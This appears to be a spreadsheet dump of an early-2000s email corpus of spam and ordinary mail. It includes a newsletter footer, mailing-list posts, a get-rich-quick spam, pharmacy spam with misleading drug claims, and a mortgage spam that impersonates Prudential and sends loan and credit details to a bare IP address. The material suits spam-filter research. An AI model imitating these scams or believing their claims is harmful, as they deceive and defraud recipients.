 &lt;/FONT&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;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width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- Thin grey line --&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=top&gt;
     &lt;TD width=1 bgColor=#83A3CB rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=10 bgColor=#1E5C99 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=3 bgColor=#ffffff rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=2&gt;&lt;/TD&gt;
     &lt;TD width=582 bgColor=#ffffff&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=1&gt;&lt;/TD&gt;
     &lt;TD width=3 bgColor=#ffffff rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=2&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=10 bgColor=#1E5C99 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#83A3CB rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 border=0&gt;
   &lt;TBODY&gt;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width=12 bgColor=#ffffff&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=12&gt;&lt;/TD&gt;
     &lt;TD width=564 bgColor=#ffffff&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;BR&gt;
 &lt;!--Elsewhere --&gt;
       &lt;FONT face="arial, helvetica" color=#990000 size=+1&gt;&lt;B&gt;Elsewhere on ZDNet&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1 src="http://www.zdnet.com/b.gif" 
             width=1 NOSEND="1"&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&lt;IMG height=4 src="http://www.zdnet.com/b.gif" width=1 
             NOSEND="1"&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0a-ZnKCIrrwX4l83l0Bwhq6GOxuYznR" &gt;Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58sviD65-M1xmYgHobjqmeR" &gt;Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcdj2djGrhb3_tvVyn4IcgyR" &gt;Find out the top 10 Web services security requirements at Tech Update.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpGf40_0zqVX4RVXFO5JSFR" &gt;Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5e-ssGdIn0i96uLdPZhsnStcVTQzc9R" &gt;Check out thousands of IT job listings in ZDNet's Career Center.&lt;/A&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=12 bgColor=#ffffff&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=12&gt;&lt;/TD&gt;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
 &lt;!-- footer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href="http://clickthru.online.com/Click?q=73-__ZeIBB9P5R_943T8UEE0WNrUZcR" &gt;free newsletters&lt;/a&gt; from ZDNet&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width="1" height="5"&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;p&gt;
 &lt;a NOTRACK href='http://clickthru.online.com/Click?q=88-ecHPrWKdiq2DGhz6rUOtj0Q9UDlaDsRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=9d-kkCWQv0hotrEmsiuKLvd75wKZzPR" &gt;Change e-mail format&lt;/a&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKF7rfPqn4AE64qDAwrPGrR" &gt;Change e-mail address&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=c8-2lPnQWOIMbAGiyxMKE-nFr99H2iR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWMAbfmlgmGZP85eXsJh-PR" &gt;Advertise&lt;/a&gt;&lt;br&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=f2-OZVTQUwPRr5GgQ10pvVdi5Z7ednR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5r7tUTmu1HiqzUbrvLkiDeR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFraA859OeNn9kgGa2oXqGyR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQi8BzG99IDFWVhZSgRXBnR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZx2oBlTNIOiJGu_NEsnEuR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=5c-BnjPIZnWYPzC51C53xlZk0f-IosR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZXeNukzs1qwuBXvl3NU2FR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJm04msp9vSjaeTldfVpf4R" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIm1AMUzmn0dAVJ9PZAKTrR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e505&amp;ISSUE=2002-07-19" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=b1-YzzzJ-x0nIpcCWJ66tnQmlHWbW9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 9 Sep 2002, Chris Haun wrote:
 &gt; ok i read back, thats not a typo, you mean three thousand lovers.
 &gt; where do you get your data? It seems very unlikely, but if you have 
 &gt; supporting evidence i'd like to see it.
 I haven't seen any official data on the web (the high-ranking hits are 
 overrun by religious bigots), but there's some anecdotal evidence to be 
 found in
 	http://sunsite.berkeley.edu:2020/dynaweb/teiproj/oh/science/aidsnur2/@Generic__BookTextView/5406
 (search for promiscuity). They mention 300 to 500 partners a year. 
 (Anecdotally. This is not a statistic). They also mention that this was 
 specific to gay males. Lesbians don't dig promiscuity in that degree.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Incredible Cash Generating System!!!,
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Greetings,
 Like most of us I have been burned in several Programs in the past. However, 
 I really, truly, believe that this program, " The Last Program" is going to 
 help me and many others achieve their lifelong financial dreams.
 Please click on the link to my web page and take just a few minutes to read 
 over the material inside. It is a really fascinating program and I am very 
 excited about its potential and I hope you will be to after you read about 
 it.
 CLICK HERE FOR DETAILS http://lastprogram.members.easyspace.com
 If you have any questions or concerns please feel free to call me at 702 604 
 6163
 Warmest regards
 Rick
 Do not reply to this message - 
 To be removed from future mailings:
 mailto:grantuit2001@yahoo.com?Subject=Remove
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re:                  RFTMBSWFN
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;&lt;title&gt;Doctors Online&lt;/title&gt;&lt;/head&gt;&lt;body bgcolor=3D"#ffffff"&gt;
 &lt;p&gt;&lt;font size=3D"+1" face=3D"Arial"&gt;&lt;b&gt;Viagra&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;pre&gt;Viagra is available online and is shipped ove=
 rnight. Our US licensed
 doctors will evaluate your medical history (online form that takes
 under 3 minutes to complete) and if you qualify for Viagra your order
 will be processed and shipped overnight. Viagra is used by millions of
 men it the US everyday. If you feel that your erection could be
 better, try Viagra. All orders shipped discreetly via FedEx&lt;/pre&gt;&lt;/font&gt;&lt;/=
 p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.globalrxco.com/main2.php?rx=3D15896"&gt;&lt;font face=3D=
 "Arial"&gt;&lt;b&gt;ORDER NOW&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size=3D"+1" face=3D"Arial"&gt;&lt;b&gt;Phentermine&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;pre&gt;Obesity weight loss drug. It enables people t=
 o burn more fat doing
 nothing, stimulating your nervous system!&lt;/pre&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.globalrxco.com/main2.php?rx=3D15896"&gt;&lt;font face=3D=
 "Arial"&gt;&lt;b&gt;ORDER NOW&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size=3D"+1" face=3D"Arial"&gt;&lt;b&gt;Meridia&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;pre&gt;Is an FDA-approved oral prescription medicati=
 on that is used for the
 medical management of obesity, including weight loss and the
 maintenance of weight loss.&lt;/pre&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.globalrxco.com/main2.php?rx=3D15896"&gt;&lt;font face=3D=
 "Arial"&gt;&lt;b&gt;ORDER NOW&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size=3D"+1" face=3D"Arial"&gt;&lt;b&gt;Xenical&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;pre&gt;Blocks the fat you are eating from being abso=
 rb by your body. No need
 for those exhausting exercise anymore!&lt;/pre&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.globalrxco.com/main2.php?rx=3D15896"&gt;&lt;font face=3D=
 "Arial"&gt;&lt;b&gt;ORDER NOW&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size=3D"+1" face=3D"Arial"&gt;&lt;b&gt;Propecia&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;pre&gt;is a medical breakthrough. The first pill tha=
 t effectively treats male
 pattern hair loss. It con-tains finasteride.&lt;/pre&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.globalrxco.com/main2.php?rx=3D15896"&gt;&lt;font face=3D=
 "Arial"&gt;&lt;b&gt;ORDER NOW&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;hr&gt;
 &lt;font face=3D"Arial" size=3D"1"&gt;
 &lt;a href=3D"http://213.139.76.181/remove.php"&gt;Click Here to be removed&lt;/a&gt;,=
  and you will *never* receive another email from us! Thank you.&lt;/font&gt;
 &lt;br&gt;&lt;br&gt;
 hope
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Entrepreneur
</t>
  </si>
  <si>
    <t xml:space="preserve">Interested                8s
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Mortgage Owners Only&lt;/title&gt;
 &lt;meta content="Microsoft FrontPage 4.0" name="GENERATOR"&gt;
 &lt;meta content="FrontPage.Editor.Document" name="ProgId"&gt;
 &lt;style&gt;&lt;/style&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p&gt;
 &lt;XMETA content="text/html; charset=iso-8859-1" 
 http-equiv="Content-Type"&gt;&lt;XMETA content="MSHTML 6.00.2600.0" 
 name="GENERATOR"&gt;&lt;XMETA content="FrontPage.Editor.Document" name="ProgId"&gt;&lt;XBODY 
 bgColor="#ffffff"&gt;
 &lt;center&gt;
 &lt;/p&gt;
 &lt;table bordercolor="green" cellspacing="2" cellpadding="2" width="557" bgcolor="#3130ce" border="1"&gt;
  &lt;tbody&gt;
   &lt;tr&gt;
    &lt;td align="middle" width="565" bgcolor="#EFEBEF"&gt;
     &lt;table height="443" cellspacing="5" cellpadding="5" width="574" border="1"&gt;
      &lt;tbody&gt;
       &lt;tr&gt;
        &lt;td align="middle" width="618" bgcolor="#182463" height="42"&gt;&lt;img border="0" src="http://195.205.236.76/cgi-bin/prudential_01.gif" align="right" width="600" height="67"&gt;&lt;/td&gt;
       &lt;/tr&gt;
       &lt;center&gt;&lt;/center&gt;
       &lt;tr&gt;
        &lt;td valign="bottom" align="middle" bgcolor="#182463" height="30" width="618"&gt;
         &lt;p style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 200%" align="center"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 200%" align="center"&gt;&lt;font face="Arial Black" size="7" color="#FFFF00"&gt;5.875%&lt;/font&gt;&lt;/p&gt;
         &lt;p style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 200%" align="center"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 100%" align="center"&gt;&lt;font face="Monotype Corsiva" color="#FFFFFF" size="5"&gt;In
         The Business of Serving Your Mortgage needs&amp;nbsp;&lt;/font&gt;&lt;/p&gt;
         &lt;p style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 100%" align="center"&gt;&lt;font face="Monotype Corsiva" color="#FFFFFF" size="5"&gt;&amp;nbsp;For More Than 50 Years&lt;/font&gt;&lt;/p&gt;
         &lt;p style="line-height: 150%; margin-top: 0px; margin-bottom: 0px" align="center"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%" align="center"&gt;&amp;nbsp;&lt;/p&gt;
        &lt;/center&gt;
        &lt;p style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%" align="center"&gt;&lt;font color="#FFFFFF" size="5"&gt;&lt;b&gt;1)
        Complete the form&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
        &lt;p style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%" align="center"&gt;&lt;font color="#FFFFFF" size="5"&gt;&lt;b&gt;2)
        Submit&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
        &lt;p style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%" align="center"&gt;&lt;font color="#FFFFFF" size="5"&gt;&lt;b&gt;3)
        Receive Approval&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/b&gt;&lt;/font&gt;&lt;center&gt;&lt;/p&gt;
        &lt;p style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%" align="center"&gt;&amp;nbsp;&lt;/p&gt;
        &lt;p style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%" align="center"&gt;&lt;font color="#FFFF00"&gt;&lt;b&gt;Any
        Questions&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
        &lt;p style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%" align="center"&gt;&lt;font face="Arial Black" color="#FFFF00" size="5"&gt;866-424-6986&lt;/font&gt;&lt;/p&gt;
        &lt;p style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%" align="center"&gt;&amp;nbsp;&amp;nbsp;&lt;/p&gt;
        &lt;p style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 100%" align="center"&gt;&lt;b&gt;&lt;font color="#fcf474"&gt;S&lt;font size="1"&gt;afe&lt;/font&gt;,
        S&lt;font size="1"&gt;imple&lt;/font&gt;, &lt;font size="1"&gt;And&lt;/font&gt; S&lt;font size="1"&gt;ure&lt;/font&gt;.&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
        &lt;/center&gt;
      &lt;tr&gt;
       &lt;td align="right" width="618" bgcolor="#18005a" height="252"&gt;
        &lt;form action="http://195.205.236.76/cgi-bin/8.pl" method="post" target="_blank"&gt;
         &lt;table bordercolor="#000000" height="250" cellspacing="0" cellpadding="1" width="606" align="center" bgcolor="#ffffff" border="0"&gt;
          &lt;tbody&gt;
           &lt;tr&gt;
            &lt;td bordercolor="#000000" bordercolorlight="#000000" align="middle" width="271" bgcolor="#182463" bordercolordark="#000000" height="31"&gt;
             &lt;p align="right"&gt;&lt;strong&gt;&lt;font face="Verdana" color="#FFFF00" size="2"&gt;Name: &lt;input id="text2" style="WIDTH: 185px; HEIGHT: 22px" tabindex="1" maxlength="25" size="30" name="Name"&gt;*&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;
            &lt;/td&gt;
            &lt;td bordercolor="#000000" bordercolorlight="#000000" align="middle" width="327" bgcolor="#182463" bordercolordark="#000000" height="31"&gt;
             &lt;p align="right"&gt;&lt;strong&gt;&lt;font face="Verdana" color="#FFFF00" size="2"&gt;Contact Phone: &lt;input id="text7" style="WIDTH: 125px; HEIGHT: 22px" tabindex="2" maxlength="15" size="16" name="ContactPhone"&gt;*&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;
            &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
            &lt;td bordercolor="#000000" bordercolorlight="#000000" align="middle" width="271" bgcolor="#182463" bordercolordark="#000000" height="25"&gt;
             &lt;p align="right"&gt;&lt;strong&gt;&lt;font face="Verdana" color="#FFFF00" size="2"&gt;State:&amp;nbsp; &lt;input id="text23" style="WIDTH: 184px; HEIGHT: 22px" tabindex="3" size="17" name="State"&gt;*&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;
            &lt;/td&gt;
            &lt;td bordercolor="#000000" bordercolorlight="#000000" align="middle" width="327" bgcolor="#182463" bordercolordark="#000000" height="25"&gt;
             &lt;p align="right"&gt;&lt;strong&gt;&lt;font face="Verdana" color="#FFFF00" size="2"&gt;Credit Rating: &lt;select id="select2" style="FONT-SIZE: 8pt" tabindex="4" size="1" name="CreditRating"&gt;
              &lt;option value="Good"&gt;Good (some lates)&lt;/option&gt;
              &lt;option value="Excellent"&gt;Excellent (no lates)&lt;/option&gt;
              &lt;option value="Fair"&gt;Fair (collection)&lt;/option&gt;
              &lt;option value="Poor" selected&gt;Poor (bankruptcy)&lt;/option&gt;
             &lt;/select&gt;*&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;
            &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
            &lt;td align="middle" width="271" bgcolor="#182463" height="37"&gt;
             &lt;p align="right"&gt;&lt;strong&gt;&lt;font face="Verdana" color="#FFFF00" size="2"&gt;Owed on 1st &lt;input id="text21" style="FONT-SIZE: 8pt; WIDTH: 44px; HEIGHT: 23px" tabindex="5" size="14" name="MoneyOwed"&gt;
             Rate: &lt;input id="text22" style="FONT-SIZE: 8pt; WIDTH: 21px; HEIGHT: 22px" tabindex="6" size="10" name="CurrentInterest"&gt;%*&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;
            &lt;/td&gt;
            &lt;td align="middle" width="327" bgcolor="#182463" height="37"&gt;
             &lt;p align="right"&gt;&lt;strong&gt;&lt;font face="Verdana" color="#FFFF00" size="2"&gt;Owed on 2nd &lt;input id="text14" style="FONT-SIZE: 8pt; WIDTH: 52px; HEIGHT: 22px" tabindex="7" size="16" name="MoneyOwed2nd"&gt;
             Rate: &lt;input id="text15" style="FONT-SIZE: 8pt; WIDTH: 36px; HEIGHT: 21px" tabindex="8" size="10" name="CurrentInterest2nd"&gt;%*&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;
            &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
            &lt;td align="middle" width="271" bgcolor="#182463" height="37"&gt;
             &lt;p align="right"&gt;&lt;strong&gt;&lt;font face="Verdana" color="#FFFF00" size="2"&gt;Home Value:&lt;input id="text13" style="WIDTH: 129px; HEIGHT: 22px" tabindex="9" size="17" name="HomeValue"&gt;*&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;
            &lt;/td&gt;
            &lt;td align="middle" width="327" bgcolor="#182463" height="37"&gt;
             &lt;p align="right"&gt;&lt;strong&gt;&lt;font face="Verdana" color="#FFFF00" size="2"&gt;Amount Requested:
             &lt;input id="text17" style="WIDTH: 75px; HEIGHT: 22px" tabindex="10" maxlength="8" size="7" value="$" name="AmountRequested"&gt;*&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;
            &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
            &lt;td align="middle" width="602" bgcolor="#182463" colspan="2" height="22"&gt;
             &lt;p align="center"&gt;&lt;strong&gt;&lt;font face="Verdana" color="#FFFF00" size="3"&gt;What would you
             like to do?&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;
            &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
            &lt;td valign="center" align="middle" width="602" bgcolor="#182463" colspan="2" height="55"&gt;
             &lt;p align="center"&gt;&lt;strong&gt;&lt;font face="Verdana" color="#fcf474" size="2"&gt;&lt;textarea id="TEXTAREA1" style="WIDTH: 524px; HEIGHT: 43px" tabindex="11" name="Comments" rows="1" cols="52"&gt;&lt;/textarea&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;
            &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
            &lt;td align="middle" width="602" bgcolor="#182463" colspan="2" height="29"&gt;
             &lt;p align="center"&gt;&lt;strong&gt;&lt;font face="Verdana" color="#fcf474" size="2"&gt;&lt;input id="submit1" style="WIDTH: 85px; COLOR: #000000; HEIGHT: 27px" tabindex="12" type="submit" size="43" value="Submit" name="Submit1"&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;
            &lt;/td&gt;
           &lt;/tr&gt;
          &lt;/tbody&gt;
         &lt;/table&gt;
        &lt;/td&gt;
        &lt;/R&gt;
        &lt;center&gt;&lt;/center&gt;
       &lt;tr&gt;
        &lt;td bordercolor="#fcf474" bordercolorlight="#fcf474" align="middle" bgcolor="#182463" bordercolordark="#fcf474" height="55" width="618"&gt;
         &lt;p style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 100%" align="center"&gt;&lt;font color="#FFFFFF"&gt;&lt;font face="Arial" size="2"&gt;&amp;nbsp;
         &lt;/font&gt;&lt;font face="arial,helvetica" size="1"&gt;Department of National Banking for Home Loans
         of the United States.&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 100%" align="center"&gt;&lt;font face="arial,helvetica" color="#FFFFFF" size="1"&gt;Equal
         Housing Lender&amp;nbsp; 2001&amp;nbsp; Prudential Mortgage Loan Search Corporation. All rights
         reserved.&lt;/font&gt;&lt;/p&gt;
        &lt;/td&gt;
        &lt;center&gt;&lt;/R&gt;
        &lt;/tr&gt;
       &lt;/tbody&gt;
      &lt;/table&gt;
     &lt;/center&gt;&lt;/td&gt;
   &lt;/tr&gt;
  &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;p align="center"&gt;&lt;a href="mailto:admin@surveysays.net?Body=Your right to be removed from our email list is fully supported by us. We are currently cleaning all our lists. Please do not alter this remove request. Altering or sending multiple remove requests will default the program and you will not be removed properly. To insure that your email address is removed from our list SIMPLY SEND. DO NOT ALTER NOR SEND MORE THAN ONCE. If you follow these directions your email address will be removed automatically the moment you send. Thank You For Your Cooperation.&amp;amp;Subject=remove"&gt;Remove&lt;/a&gt;&lt;/p&gt;
 &lt;/FORM&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">At this instance there are several thousand happy users of the Razor v2
 system. The code is still officially in Beta, but the first stable release
 is around the corner. If you are seeing problems, download the latest
 version; most likely the problem has been fixed already, if not, send a
 bug report to razor-testers@lists.sf.net or to chad@cloudmark.com
 cheers,
 vipul.
 On Wed, Jul 24, 2002 at 10:02:51AM -0700, Patrick wrote:
 &gt; On Wed, 24 Jul 2002, rODbegbie wrote:
 &gt; 
 &gt; &gt; rODbegbie wrote:
 &gt; &gt; &gt; I get the impression that Vipul &amp; co are deliberately trying to
 &gt; &gt; &gt; mislead users into downloading the dev code in order to get more
 &gt; &gt; &gt; unwitting test sites.
 &gt; &gt;
 &gt; &gt; Apologies to all.  In re-reading, that sentence sounds a lot harsher than I
 &gt; &gt; intended.
 &gt; 
 &gt; The question I have is: what needs to be done/help needs to be provided to
 &gt; make the system suck less? It's obviously a great idea, it just needs some
 &gt; work...
 &gt; 
 &gt; /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
 &gt;                                Patrick Greenwell
 &gt;          Asking the wrong questions is the leading cause of wrong answers
 &gt; \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
 &gt; 
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; Welcome to geek heaven.
 &gt; http://thinkgeek.com/sf
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users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</si>
  <si>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Subject: John Robb: "Yesterday, AT&amp;T upgraded my cable box to a digital
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:5:24:45AM
 Date: Wed, 25 Sep 2002 12:24:45 GMT
 John Robb[1]: "Yesterday, AT&amp;T upgraded my cable box to a digital system."
 [1] http://jrobb.userland.com/2002/09/25.html#a2595
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;
 &gt;
 &gt; The question then becomes, why is knowledge sharing such a difficult 
 &gt; thing in organizations? Is it, perhaps, not as difficult as the 
 &gt; grousers say? I mistrust the romantic, Rousseauian argument that man 
 &gt; is basically good but society basically corrupt, and that the later 
 &gt; stifles the natural altruistic impulses. After all, it's in society 
 &gt; that we share, as well as hoard.  Is it that we think of "The 
 &gt; Organization" as a machine, and like the research subjects get less 
